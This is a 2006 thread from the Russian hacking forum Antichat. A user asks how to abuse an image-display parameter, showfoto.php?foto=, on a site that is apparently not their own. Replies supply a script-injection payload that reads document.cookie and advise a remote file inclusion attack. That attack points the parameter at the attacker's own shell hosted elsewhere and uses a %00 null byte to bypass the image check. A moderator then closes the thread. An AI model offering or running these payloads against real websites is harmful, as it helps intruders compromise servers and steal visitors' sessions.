Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Можно ли что-то с этим сделать? (https://forum.antichat.xyz/showthread.php?t=16619)

FoGorm 27.03.2006 23:42

Можно ли что-то с этим сделать?
 
Ребятки помогите, подскажите можно ли что-то сделать, если есть такое:

showfoto.php?foto=/images/img.gif
Вот такая ссылка на картинку..

Когда пишу

showfoto.php?foto=">

То выводит, что картинки нету и " border=0>

Можно ли что-то прописать вредное? :)

vectorg 27.03.2006 23:44

xxs


showfoto.php?foto="><script>alert(document.cookie) </script>

qBiN 27.03.2006 23:47

возможно php-include

FoGorm 27.03.2006 23:53

VectorG
XSS меня не сильно интересует, т.к. на сайте нету авторизации, вообщим нету и кукисов... так что воровать их бесмысленно )

FoGorm 27.03.2006 23:54

qBiN, поделишь пожалуйста подробностями.

qBiN 28.03.2006 00:03

Цитата:

qBiN, поделишь пожалуйста подробностями.
Во-первых будешь так называть темы получишь по башке,я модер нервный...
Во-вторых повторяю я модер нервный и не люблю переделывать два сообщения одного пользователя в одно,поэтому советую тебе сделать это(либо это сделаю я,понизив тебе репу)
В третьих RTFM
В четвертых ничо конкретного сказать не могу,скрипт не видел.
зы:вот такой я злой :-)

vectorg 28.03.2006 00:03

Цитата:

поделишь пожалуйста подробностями.
ссылку в студиу или в приват мне
телепатов нет!

m0nzt3r 29.03.2006 22:44

Цитата:

Сообщение от FoGorm
qBiN, поделишь пожалуйста подробностями.

showfoto.php?foto=/images/img.gif вместо ентого подставить showfoto.php?foto=http://адрес_твоего_шелла_на_хости нге_без_пхп хотя я думаю скрипт инклудит токо картинки..но %00 может обойти хотя древняя весчь
Матвей нехарашо!)

qBiN 31.03.2006 00:10

Автор спит тему закрываю ибо нет информативности, да и к форумам не относится.


Время: 13:12